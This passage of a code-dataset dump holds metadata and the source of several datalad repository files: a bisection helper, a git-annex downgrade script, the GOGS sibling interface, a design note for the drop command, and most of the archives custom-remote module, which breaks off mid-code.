id_ = \"f0b02e9d092d905d0d87a8455a1ae3e9bb47b4aa3dc125125ca5cd10d6441c9f\"\n outfile = ds_repo.pathobj / \"blob\"\n url = \"https://registry-1.docker.io/v2/library/busybox/blobs/sha256:\" + id_\n ds.download_url(urls=[url], path=str(outfile))\n\n annex_info = ds.repo.get_content_annexinfo(paths=[outfile], init=None)\n eq_(id_, annex_info[outfile][\"keyname\"])\n assert_in(DATALAD_SPECIAL_REMOTES_UUIDS[DATALAD_SPECIAL_REMOTE],\n ds_repo.whereis([str(outfile)])[0])\n" }, { "alpha_fraction": 0.7081544995307922, "alphanum_fraction": 0.716738224029541, "avg_line_length": 31.13793182373047, "blob_id": "493bf49b0f42d89a1d6bb073a4d078fd1546ebf4", "content_id": "3b86c73b775c23fdbcf3e83732197a769ced785a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 932, "license_type": "permissive", "max_line_length": 79, "num_lines": 29, "path": "/tools/bisect-git-annex", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# A helper script that first builds git-annex using a Singularity image before\n# running the bisection command. It should be called from the git-annex source\n# tree as\n#\n# $ git bisect run /path/to/bisect-git-annex IMAGE CMD...\n#\n# where IMAGE is the singularity image or, if an image doesn't exist, the path\n# to which the Singularity image should be downloaded. CMD will be executed if\n# the build completes successfully.\n\nset -eu\nannex_gitver=$(git describe)\nlogfile=$(mktemp -p '' git-annex-build-${annex_gitver}-XXXXXX.log)\n\n[ -e Annex.hs ] # just to make sure that it is invoked in the correct location\necho \"I: cleaning $PWD\"\ngit clean -dfx >/dev/null 2>&1\n\necho \"I: building $annex_gitver\"\nif ! make linuxstandalone 1>\"$logfile\" 2>&1; then\n echo \"E: failed to build, can't test this one. See $logfile\"\n exit 125\nfi\nexport PATH=$PWD/tmp/git-annex.linux/:$PATH\n\necho \"I: running the script\"\neval \"$@\"\n" }, { "alpha_fraction": 0.6968325972557068, "alphanum_fraction": 0.7239819169044495, "avg_line_length": 26.625, "blob_id": "3feb637c9bde6366574be3ae3dd59fc4f398b376", "content_id": "06d2cf385ab5aab0b411491ff6b0e72e328c43c7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 221, "license_type": "permissive", "max_line_length": 63, "num_lines": 8, "path": "/pyproject.toml", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "[build-system]\n# wheel to get more lightweight (not EASY-INSTALL) entry-points\nrequires = [\"packaging\", \"setuptools>=40.8.0\", \"wheel\"]\n\n[tool.isort]\nforce_grid_wrap = 2\ninclude_trailing_comma = true\nmulti_line_output = 3\n" }, { "alpha_fraction": 0.7508896589279175, "alphanum_fraction": 0.7508896589279175, "avg_line_length": 30.22222137451172, "blob_id": "9f5d0bfe3fb8a706a56612304000f549b5ba9b28", "content_id": "40ccf11f1ab96420a97ce3d2790ae86416b3dfb6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 281, "license_type": "permissive", "max_line_length": 82, "num_lines": 9, "path": "/datalad/plugin/export_archive.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.export_archive is deprecated and will be removed in a future \"\n \"release. \"\n \"Use the module from its new location datalad.local.export_archive instead.\",\n DeprecationWarning)\n\nfrom datalad.local.export_archive import *\n" }, { "alpha_fraction": 0.613394558429718, "alphanum_fraction": 0.6162959337234497, "avg_line_length": 34.050846099853516, "blob_id": "9a112673ebd1575d443efc60c237bfde9404b104", "content_id": "ecf07d2311695a860b03fa34087b112d76f4e4c8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4136, "license_type": "permissive", "max_line_length": 87, "num_lines": 118, "path": "/datalad/distributed/create_sibling_gogs.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for creating a publication target on a GOGS instance\n\"\"\"\n\nimport logging\nfrom urllib.parse import urlparse\n\nfrom datalad.distributed.create_sibling_ghlike import (\n _create_sibling,\n _GitHubLike,\n)\nfrom datalad.distribution.dataset import datasetmethod\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\n\nlgr = logging.getLogger('datalad.distributed.create_sibling_gogs')\n\n\nclass _GOGS(_GitHubLike):\n \"\"\"Customizations for the GOGS platform\"\"\"\n name = 'gogs'\n fullname = 'GOGS'\n create_org_repo_endpoint = 'api/v1/org/{organization}/repos'\n create_user_repo_endpoint = 'api/v1/user/repos'\n get_authenticated_user_endpoint = 'api/v1/user'\n get_repo_info_endpoint = 'api/v1/repos/{user}/{repo}'\n extra_remote_settings = {\n # first make sure that annex doesn't touch this one\n # but respect any existing config\n 'annex-ignore': 'true',\n }\n\n def __init__(self, url, credential, require_token=True, token_info=None):\n if not url:\n raise ValueError(f'API URL required for {self.fullname}')\n return super().__init__(\n url,\n credential,\n require_token=require_token,\n token_info=f'Visit {url}/user/settings/applications '\n 'to create a token')\n\n\n@build_doc\nclass CreateSiblingGogs(Interface):\n \"\"\"Create a dataset sibling on a GOGS site\n\n GOGS is a self-hosted, free and open source code hosting solution with\n low resource demands that enable running it on inexpensive devices like\n a Raspberry Pi, or even directly on a NAS device.\n\n In order to be able to use this command, a personal access token has to be\n generated on the platform\n (Account->Your Settings->Applications->Generate New Token).\n\n This command can be configured with\n \"datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE\" in\n order to add any local KEY = VALUE configuration to the created sibling in\n the local `.git/config` file. NETLOC is the domain of the Gogs instance to\n apply the configuration for.\n This leads to a behavior that is equivalent to calling datalad's\n ``siblings('configure', ...)``||``siblings configure`` command with the\n respective KEY-VALUE pair after creating the sibling.\n The configuration, like any other, could be set at user- or system level, so\n users do not need to add this configuration to every sibling created with\n the service at NETLOC themselves.\n\n .. versionadded:: 0.16\n \"\"\"\n\n _params_ = _GOGS.create_sibling_params\n _params_['api']._doc = \"\"\"\\\n URL of the GOGS instance without a 'api/<version>' suffix\"\"\"\n\n @staticmethod\n @datasetmethod(name='create_sibling_gogs')\n @eval_results\n def __call__(\n reponame,\n *,\n # possibly retrieve a default from config\n api=None,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n name=None,\n existing='error',\n credential=None,\n access_protocol='https',\n publish_depends=None,\n private=False,\n description=None,\n dry_run=False):\n\n yield from _create_sibling(\n platform=_GOGS(api, credential, require_token=not dry_run),\n reponame=reponame,\n dataset=dataset,\n recursive=recursive,\n recursion_limit=recursion_limit,\n name=name,\n existing=existing,\n access_protocol=access_protocol,\n publish_depends=publish_depends,\n private=private,\n description=description,\n dry_run=dry_run,\n )\n" }, { "alpha_fraction": 0.6044830083847046, "alphanum_fraction": 0.6167751550674438, "avg_line_length": 39.661766052246094, "blob_id": "bcfc0d1f055348e1ade92890ad87a21d3bbc2924", "content_id": "ed6d405c47571171c7052253b70b4d3c9da42a1f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2766, "license_type": "permissive", "max_line_length": 112, "num_lines": 68, "path": "/tools/monitor-interrupts.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python2\n#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- \n#ex: set sts=4 ts=4 sw=4 noet:\n\"\"\"\n\n COPYRIGHT: Yaroslav Halchenko 2015\n\n LICENSE: MIT\n\n Permission is hereby granted, free of charge, to any person obtaining a copy\n of this software and associated documentation files (the \"Software\"), to deal\n in the Software without restriction, including without limitation the rights\n to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the Software is\n furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included in\n all copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n THE SOFTWARE.\n\"\"\"\n\n__author__ = 'Yaroslav Halchenko'\n__copyright__ = 'Copyright (c) 2015 Yaroslav Halchenko'\n__license__ = 'MIT'\n\nimport re, numpy as np, time\n\nreline = re.compile('(?P<int>[^:]*):(?P<counts>[\\s0-9]*)(?P<desc>.*$)')\nfname = '/proc/interrupts'\n\ncounts = None\nwhile True:\n with open(fname) as f:\n old_counts = counts\n lines = f.readlines()\n cpus = lines[0].split()\n names, counts_list, totals = [], [], []\n for l in lines[1:]:\n r = reline.match(l)\n d = r.groupdict()\n c = map(int, d['counts'].split())\n if len(c) != len(cpus):\n totals.append(l)\n else:\n counts_list.append(c)\n names.append((d['int'], d['desc']))\n counts = np.array(counts_list)\n assert(counts.ndim == 2)\n names = np.array(names) # to ease indexing\n if old_counts is not None:\n # do reporting of most active ones\n diff = counts - old_counts\n maxdiff = np.max(diff)\n strformat = \"%%%ds\" % (max(np.log10(maxdiff)+1, 4))\n diff_total = np.sum(diff, axis=1)\n most_active = np.argsort(diff_total)[::-1]\n print \" \"*37 + ' '.join([strformat%c for c in ['TOTAL'] + cpus])\n for name, dt, d in zip(names[most_active], diff_total[most_active], diff[most_active])[:5]:\n print \"%4s %30s: %s %s\" % (name[0], name[1], strformat%dt, ' '.join([strformat % x for x in d]))\n print ''.join(totals)\n time.sleep(1)\n\n" }, { "alpha_fraction": 0.6571747660636902, "alphanum_fraction": 0.6661083102226257, "avg_line_length": 22.552631378173828, "blob_id": "aff18f47aa7059f418563e81779d0e60a039b265", "content_id": "97e1ac616bcf2af11ae3119bb15b1903850654d2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1791, "license_type": "permissive", "max_line_length": 111, "num_lines": 76, "path": "/tools/downgrade-annex", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eu\n\nexport PS4='> '\n# set -x\n\nfunction info () {\n echo \"INFO: $*\"\n}\n\nfunction error() {\n echo \"ERROR: $1\" >&2\n exit \"${2:-1}\"\n}\n\nfunction fsck() {\n info \"FSCKing\"\n git annex fsck --fast -q\n}\n\nfunction check_clean() {\n info \"Checking if all clean\"\n git diff --quiet --exit-code --ignore-submodules && git diff --exit-code --ignore-submodules --cached --quiet\n}\n\n\nif $(git config --global annex.autoupgraderepository) != false; then\n error \"Please disable auto upgrades first\"\nfi\n\ncd \"${1:-.}\"\n\nannex_version=$(git annex version | awk -e '/^git-annex version:/{print $3}')\ncase \"$annex_version\" in\n 5.*|6.*|7.*) info \"git-annex $annex_version . Good, proceeding\";;\n *) error \"git-annex $annex_version . Please downgrade to proceed\";;\nesac\n\nrepo_annex_version=$(git config annex.version)\ncase \"$repo_annex_version\" in\n 5) echo \"you are good - already version $repo_annex_version\"; exit 0;;\n 8) ;;\n *) error \"do not know how to downgrade $repo_annex_version, fix me\"\nesac\n\n# needs recent annex\n# unlocked=( $(git annex find --unlocked) )\nunlocked=( $(git grep -l -a --no-textconv --cached '^/annex/objects/' || :) )\nif [ \"${#unlocked[*]}\" -ge 1 ]; then\n error \"Found ${#unlocked[*]} unlocked files. Cannot do: ${unlocked[*]}\" 2\nfi\n\n# Cannot do - needs more recent annex\n# fsck\ncheck_clean\n\ngit config --remove-section filter.annex || echo \"Failed to remove filter.annex, may be gone already\"\nsed -i -n -e '/filter=annex/d' .git/info/attributes\nrm -f .git/hooks/post-checkout .git/hooks/post-merge\nrm -rf .git/annex/keysdb .git/annex/fsck .git/annex/export\n\ngit config annex.version 5\n\nfsck\ncheck_clean\n\n## Let's do a dummy basic operation test\n#echo data > data\n#git annex add data\n#git commit -m 'sample data' data\n#\n#fsck\n#check_clean\n\ninfo \"DONE, all good\"\n\n" }, { "alpha_fraction": 0.6695619225502014, "alphanum_fraction": 0.6956193447113037, "avg_line_length": 34.783782958984375, "blob_id": "a66bcaf6f11c4277012d19091398db09b3a47532", "content_id": "f6f6e2d4606718ac68ee870bb0114eaacb2ebd03", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5391, "license_type": "permissive", "max_line_length": 88, "num_lines": 148, "path": "/docs/source/design/drop.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_drop:\n\n***********************\nDrop dataset components\n***********************\n\n.. topic:: Specification scope and status\n\n This specification is a proposal, subject to review and further discussion.\n It is now partially implemented in the `drop` command.\n\n§1 The :command:`drop` command is the antagonist of :command:`get`. Whatever a\n`drop` can do, should be undoable by a subsequent :command:`get` (given\nunchanged remote availability).\n\n§2 Like :command:`get`, :command:`drop` primarily operates on a mandatory path\nspecification (to discover relevant files and sudatasets to operate on).\n\n§3 :command:`drop` has ``--what`` parameter that serves as an extensible\n\"mode-switch\" to cover all relevant scenarios, like 'drop all file content in\nthe work-tree' (e.g. ``--what files``, default, `#5858\n<https://github.com/datalad/datalad/issues/5858>`__), 'drop all keys from any\nbranch' (i.e. ``--what allkeys``, `#2328\n<https://github.com/datalad/datalad/issues/2328>`__), but also '\"drop\" AKA\nuninstall entire subdataset hierarchies' (e.g. ``--what all``), or drop\npreferred content (``--what preferred-content``, `#3122\n<https://github.com/datalad/datalad/issues/3122>`__).\n\n§4 :command:`drop` prevents data loss by default (`#4750\n<https://github.com/datalad/datalad/issues/4750>`__). Like :command:`get` it\nfeatures a ``--reckless`` \"mode-switch\" to disable some or all potentially slow\nsafety mechanism, i.e. 'key available in sufficient number of other remotes',\n'main or all branches pushed to remote(s)' (`#1142\n<https://github.com/datalad/datalad/issues/1142>`__), 'only check availability\nof keys associated with the worktree, but not other branches'. \"Reckless\noperation\" can be automatic, when following a reckless :command:`get` (`#4744\n<https://github.com/datalad/datalad/issues/4744>`__).\n\n§5 :command:`drop` properly manages annex lifetime information, e.g. by announcing\nan annex as ``dead`` on removal of a repository (`#3887\n<https://github.com/datalad/datalad/issues/3887>`__).\n\n§6 Like :command:`get`, drop supports parallelization `#1953\n<https://github.com/datalad/datalad/issues/1953>`__ \n\n§7 `datalad drop` is not intended to be a comprehensive frontend to `git annex\ndrop` (e.g. limited support for e.g. `#1482\n<https://github.com/datalad/datalad/issues/1482>`__ outside standard use cases\nlike `#2328 <https://github.com/datalad/datalad/issues/2328>`__).\n\n.. note::\n It is understood that the current `uninstall` command is largely or\n completely made obsolete by this :command:`drop` concept.\n\n§8 Given the development in `#5842\n<https://github.com/datalad/datalad/issues/5842>`__ towards the complete\nobsolescence of `remove` it becomes necessary to import one of its proposed\nfeatures:\n\n§9 :command:`drop` should be able to recognize a botched attempt to delete a\ndataset with a plain rm -rf, and act on it in a meaningful way, even if it is\njust hinting at chmod + rm -rf.\n\n\nUse cases\n=========\n\nThe following use cases operate in the dataset hierarchy depicted below::\n\n super\n ├── dir\n │ ├── fileD1\n │ └── fileD2\n ├── fileS1\n ├── fileS2\n ├── subA\n │ ├── fileA\n │ ├── subsubC\n │ │ ├── fileC\n │ └── subsubD\n └── subB\n └── fileB\n\nUnless explicitly stated, all command are assumed to be executed in the root of `super`.\n\n- U1: ``datalad drop fileS1``\n\n Drops the file content of `file1` (as currently done by :command:`drop`)\n\n- U2: ``datalad drop dir``\n\n Drop all file content in the directory (``fileD{1,2}``; as currently done by\n :command:`drop`\n\n- U3: ``datalad drop subB``\n\n Drop all file content from the entire `subB` (`fileB`)\n\n- U4: ``datalad drop subB --what all``\n\n Same as above (default ``--what files``), because it is not operating in the\n context of a superdataset (no automatic upward lookups). Possibly hint at\n next usage pattern).\n\n- U5: ``datalad drop -d . subB --what all``\n\n Drop all from the superdataset under this path. I.e. drop all from the\n subdataset and drop the subdataset itself (AKA uninstall)\n\n- U6: ``datalad drop subA --what all``\n\n Error: \"``subA`` contains subdatasets, forgot --recursive?\"\n\n- U7: ``datalad drop -d . subA -r --what all``\n\n Drop all content from the subdataset (``fileA``) and its subdatasets\n (``fileC``), uninstall the subdataset (``subA``) and its subdatasets\n (``subsubC``, ``subsubD``)\n\n- U8: ``datalad drop subA -r --what all``\n\n Same as above, but keep ``subA`` installed\n\n- U9: ``datalad drop sub-A -r``\n\n Drop all content from the subdataset and its subdatasets (``fileA``,\n ``fileC``)\n\n- U10: ``datalad drop . -r --what all``\n\n Drops all file content and subdatasets, but leaves the superdataset\n repository behind\n\n- U11: ``datalad drop -d . subB``\n\n Does nothing and hints at alternative usage, see\n https://github.com/datalad/datalad/issues/5832#issuecomment-889656335\n\n- U12: ``cd .. && datalad drop super/dir``\n\n Like :command:`get`, errors because the execution is not associated with a\n dataset. This avoids complexities, when the given `path`'s point to multiple\n (disjoint) datasets. It is understood that it could be done, but it is\n intentionally not done. `datalad -C super drop dir` or `datalad drop -d super\n super/dir` would work.\n" }, { "alpha_fraction": 0.5732051134109497, "alphanum_fraction": 0.5770195126533508, "avg_line_length": 38.70539474487305, "blob_id": "a13504548217b15b4fa13ea42a3d7f809e9b5de1", "content_id": "9a78292c77cfaa69b1452a30a83ec2c261513ff0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19138, "license_type": "permissive", "max_line_length": 123, "num_lines": 482, "path": "/datalad/customremotes/archives.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Custom remote to get the load from archives present under annex\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport os\nimport os.path as op\nimport shutil\nfrom operator import itemgetter\nfrom pathlib import Path\nfrom urllib.parse import urlparse\n\nfrom annexremote import UnsupportedRequest\n\nfrom datalad.consts import ARCHIVES_SPECIAL_REMOTE\nfrom datalad.customremotes import RemoteError\nfrom datalad.customremotes.main import main as super_main\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.archives import ArchivesCache\nfrom datalad.support.cache import DictCache\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.support.locking import lock_if_check_fails\nfrom datalad.support.network import URL\nfrom datalad.utils import (\n ensure_bytes,\n get_dataset_root,\n getpwd,\n unique,\n unlink,\n)\n\nfrom .base import AnnexCustomRemote\n\nlgr = logging.getLogger('datalad.customremotes.archive')\n\n\n# ####\n# Preserve from previous version\n# TODO: document intention\n# ####\n# this one might get under Runner for better output/control\ndef link_file_load(src, dst, dry_run=False):\n \"\"\"Just a little helper to hardlink files's load\n \"\"\"\n dst_dir = op.dirname(dst)\n if not op.exists(dst_dir):\n os.makedirs(dst_dir)\n if op.lexists(dst):\n lgr.log(9, \"Destination file %(dst)s exists. Removing it first\",\n locals())\n # TODO: how would it interact with git/git-annex\n unlink(dst)\n lgr.log(9, \"Hardlinking %(src)s under %(dst)s\", locals())\n src_realpath = op.realpath(src)\n\n try:\n os.link(src_realpath, dst)\n except (OSError, AttributeError) as e:\n # we need to catch OSError too, because Python's own logic\n # of not providing link() where it is known to be unsupported\n # (e.g. Windows) will not cover scenarios where a particular\n # filesystem simply does not implement it on an otherwise\n # sane platform (e.g. exfat on Linux)\n lgr.warning(\"Linking of %s failed (%s), copying file\" % (src, e))\n shutil.copyfile(src_realpath, dst)\n shutil.copystat(src_realpath, dst)\n else:\n lgr.log(2, \"Hardlinking finished\")\n\n\n# TODO: RF functionality not specific to being a custom remote (loop etc)\n# into a separate class\nclass ArchiveAnnexCustomRemote(AnnexCustomRemote):\n \"\"\"Special custom remote allowing to obtain files from archives\n\n Archives must be under annex'ed themselves.\n \"\"\"\n CUSTOM_REMOTE_NAME = \"archive\"\n SUPPORTED_SCHEMES = (\n AnnexCustomRemote._get_custom_scheme(CUSTOM_REMOTE_NAME),)\n # Since we support only 1 scheme here\n URL_SCHEME = SUPPORTED_SCHEMES[0]\n URL_PREFIX = URL_SCHEME + \":\"\n\n COST = 500\n\n def __init__(self, annex, path=None, persistent_cache=True, **kwargs):\n super().__init__(annex)\n\n # MIH figure out what the following is all about\n # in particular path==None\n self.repo = Dataset(get_dataset_root(Path.cwd())).repo \\\n if not path \\\n else AnnexRepo(path, create=False, init=False)\n\n self.path = self.repo.path\n # annex requests load by KEY not but URL which it originally asked\n # about. So for a key we might get back multiple URLs and as a\n # heuristic let's use the most recently asked one\n\n self._last_url = None # for heuristic to choose among multiple URLs\n self._cache = ArchivesCache(self.path, persistent=persistent_cache)\n self._contentlocations = DictCache(size_limit=100) # TODO: config ?\n\n def stop(self, *args):\n \"\"\"Stop communication with annex\"\"\"\n self._cache.clean()\n\n def get_file_url(self, archive_file=None, archive_key=None, file=None,\n size=None):\n \"\"\"Given archive (file or a key) and a file -- compose URL for access\n\n Examples\n --------\n\n dl+archive:SHA256E-s176--69...3e.tar.gz#path=1/d2/2d&size=123\n when size of file within archive was known to be 123\n dl+archive:SHA256E-s176--69...3e.tar.gz#path=1/d2/2d\n when size of file within archive was not provided\n\n Parameters\n ----------\n size: int, optional\n Size of the file. If not provided, will simply be empty\n \"\"\"\n assert(file is not None)\n if archive_file is not None:\n if archive_key is not None:\n raise ValueError(\n \"Provide archive_file or archive_key - not both\")\n archive_key = self.repo.get_file_annexinfo(archive_file)['key']\n assert(archive_key is not None)\n attrs = dict() # looking forward for more\n if file:\n attrs['path'] = file.lstrip('/')\n if size is not None:\n attrs['size'] = size\n return str(URL(scheme=self.URL_SCHEME,\n path=archive_key,\n fragment=attrs))\n\n @property\n def cache(self):\n return self._cache\n\n def _parse_url(self, url):\n \"\"\"Parse url and return archive key, file within archive and\n additional attributes (such as size)\"\"\"\n url = URL(url)\n assert(url.scheme == self.URL_SCHEME)\n fdict = url.fragment_dict\n if 'path' not in fdict:\n # must be old-style key/path#size=\n assert '/' in url.path, \"must be of key/path format\"\n key, path = url.path.split('/', 1)\n else:\n key, path = url.path, fdict.pop('path')\n if 'size' in fdict:\n fdict['size'] = int(fdict['size'])\n return key, path, fdict\n\n def _gen_akey_afiles(self, key, sorted=False, unique_akeys=True):\n \"\"\"Given a key, yield akey, afile pairs\n\n if `sorted`, then first those which have extracted version in local\n cache will be yielded\n\n Gets determined based on urls for datalad archives\n\n Made \"generators all the way\" as an exercise but also to delay any\n checks etc until really necessary.\n \"\"\"\n # we will need all URLs anyways later on ATM, so lets list() them\n # Anyways here we have a single scheme (archive) so there is not\n # much optimization possible\n urls = list(self.gen_URLS(key))\n\n akey_afiles = [\n self._parse_url(url)[:2] # skip size\n for url in urls\n ]\n\n if unique_akeys:\n akey_afiles = unique(akey_afiles, key=itemgetter(0))\n\n if not sorted:\n for pair in akey_afiles:\n yield pair\n return\n\n # Otherwise we will go through each one\n\n # multiple URLs are available so we need to figure out which one\n # would be most efficient to \"deal with\"\n akey_afile_paths = (\n ((akey, afile), self.get_contentlocation(\n akey,\n absolute=True, verify_exists=False\n ))\n for akey, afile in akey_afiles\n )\n\n # by default get_contentlocation would return empty result for a key\n # which is not available locally. But we could still have extracted\n # archive in the cache. So we need pretty much get first all possible\n # and then only remove those which aren't present locally. So\n # verify_exists was added\n yielded = set()\n akey_afile_paths_ = []\n\n # utilize cache to check which archives might already be present in the\n # cache\n for akey_afile, akey_path in akey_afile_paths:\n if akey_path and self.cache[akey_path].is_extracted:\n yield akey_afile\n yielded.add(akey_afile)\n akey_afile_paths_.append((akey_afile, akey_path))\n\n # replace generators with already collected ones into a list. The idea\n # that in many cases we don't even need to create a full list and that\n # initial single yield would be enough, thus we don't need to check\n # locations etc for every possible hit\n akey_afile_paths = akey_afile_paths_\n\n # if not present in the cache -- check which are present\n # locally and choose that one to use, so it would get extracted\n for akey_afile, akey_path in akey_afile_paths:\n if akey_path and op.exists(akey_path):\n yielded.add(akey_afile)\n yield akey_afile\n\n # So no archive is present either in the cache or originally under\n # annex XXX some kind of a heuristic I guess is to use last_url ;-)\n if self._last_url and self._last_url in urls \\\n and (len(urls) == len(akey_afiles)):\n akey_afile, _ = akey_afile_paths[urls.index(self._last_url)]\n yielded.add(akey_afile)\n yield akey_afile\n\n for akey_afile, _ in akey_afile_paths:\n if akey_afile not in yielded:\n yield akey_afile\n\n def get_contentlocation(self, key, absolute=False, verify_exists=True):\n \"\"\"Return (relative to top or absolute) path to the file containing the key\n\n This is a wrapper around AnnexRepo.get_contentlocation which provides\n caching of the result (we are asking the location for the same archive\n key often)\n \"\"\"\n if key not in self._contentlocations:\n fpath = self.repo.get_contentlocation(key, batch=True)\n if fpath: # shouldn't store empty ones\n self._contentlocations[key] = fpath\n else:\n fpath = self._contentlocations[key]\n # but verify that it exists\n if verify_exists and not op.lexists(op.join(self.path, fpath)):\n # prune from cache\n del self._contentlocations[key]\n fpath = ''\n\n if absolute and fpath:\n return op.join(self.path, fpath)\n else:\n return fpath\n\n # Protocol implementation\n def checkurl(self, url):\n # TODO: what about those MULTI and list to be returned?\n # should we return all filenames or keys within archive?\n # might be way too many?\n # only if just archive portion of url is given or the one pointing\n # to specific file?\n lgr.debug(\"Current directory: %s, url: %s\", os.getcwd(), url)\n akey, afile, attrs = self._parse_url(url)\n size = attrs.get('size', None)\n\n # But reply that present only if archive is present\n # TODO: this would throw exception if not present, so this statement is\n # kinda bogus\n akey_path = self.get_contentlocation(akey, absolute=True)\n if akey_path:\n # Extract via cache only if size is not yet known\n if size is None:\n # if for testing we want to force getting the archive extracted\n efile = self.cache[akey_path].get_extracted_filename(afile)\n efile = ensure_bytes(efile)\n\n if op.exists(efile):\n size = os.stat(efile).st_size\n\n # so it was a good successful one -- record\n self._last_url = url\n\n if size is None:\n return True\n else:\n # FIXME: providing filename causes annex to not even talk to\n # ask upon drop :-/\n return [dict(size=size)] # , basename(afile))\n\n else:\n # TODO: theoretically we should first check if key is available\n # from any remote to know if file is available\n return False\n\n def checkpresent(self, key):\n # TODO: so we need to maintain mapping from urls to keys. Then\n # we could even store the filename within archive\n # Otherwise it is unrealistic to even require to recompute key if we\n # knew the backend etc\n # The same content could be available from multiple locations within\n # the same archive, so let's not ask it twice since here we don't care\n # about \"afile\"\n for akey, _ in self._gen_akey_afiles(key, unique_akeys=True):\n if self.get_contentlocation(akey) \\\n or self.repo.is_available(akey, batch=True, key=True):\n return True\n # it is unclear to MIH why this must be UNKNOWN rather than FALSE\n # but this is how I found it\n raise RemoteError('Key not present')\n\n def remove(self, key):\n raise UnsupportedRequest('This special remote cannot remove content')\n # # TODO: proxy query to the underlying tarball under annex that if\n # # tarball was removed (not available at all) -- report success,\n # # otherwise failure (current the only one)\n # akey, afile = self._get_akey_afile(key)\n # if False:\n # # TODO: proxy, checking present of local tarball is not\n # # sufficient\n # # not exists(self.get_key_path(key)):\n # self.send(\"REMOVE-SUCCESS\", akey)\n # else:\n # self.send(\"REMOVE-FAILURE\", akey,\n # \"Removal from file archives is not supported\")\n\n def whereis(self, key):\n return False\n # although more logical is to report back success, it leads to imho\n # more confusing duplication. See\n # http://git-annex.branchable.com/design/external_special_remote_protocol/#comment-3f9588f6a972ae566347b6f467b53b54\n # try:\n # key, file = self._get_akey_afile(key)\n # self.send(\"WHEREIS-SUCCESS\", \"file %s within archive %s\" % (file, key))\n # except ValueError:\n # self.send(\"WHEREIS-FAILURE\")\n\n def transfer_retrieve(self, key, file):\n akeys_tried = []\n # the same file could come from multiple files within the same archive\n # So far it doesn't make sense to \"try all\" of them since if one fails\n # it means the others would fail too, so it makes sense to immediately\n # prune the list so we keep only the ones from unique akeys.\n # May be whenever we support extraction directly from the tarballs\n # we should go through all and choose the one easiest to get or smth.\n for akey, afile in self._gen_akey_afiles(\n key, sorted=True, unique_akeys=True):\n if not akey:\n lgr.warning(\"Got an empty archive key %r for key %s. Skipping\",\n akey, key)\n continue\n akeys_tried.append(akey)\n try:\n with lock_if_check_fails(\n check=(self.get_contentlocation, (akey,)),\n lock_path=(\n lambda k: op.join(self.repo.path,\n '.git',\n 'datalad-archives-%s' % k),\n (akey,)),\n operation=\"annex-get\"\n ) as (akey_fpath, lock):\n if lock:\n assert not akey_fpath\n self._annex_get_archive_by_key(akey)\n akey_fpath = self.get_contentlocation(akey)\n\n if not akey_fpath:\n raise RuntimeError(\n \"We were reported to fetch it alright but now can't \"\n \"get its location. Check logic\"\n )\n\n akey_path = op.join(self.repo.path, akey_fpath)\n assert op.exists(akey_path), \\\n \"Key file %s is not present\" % akey_path\n\n # Extract that 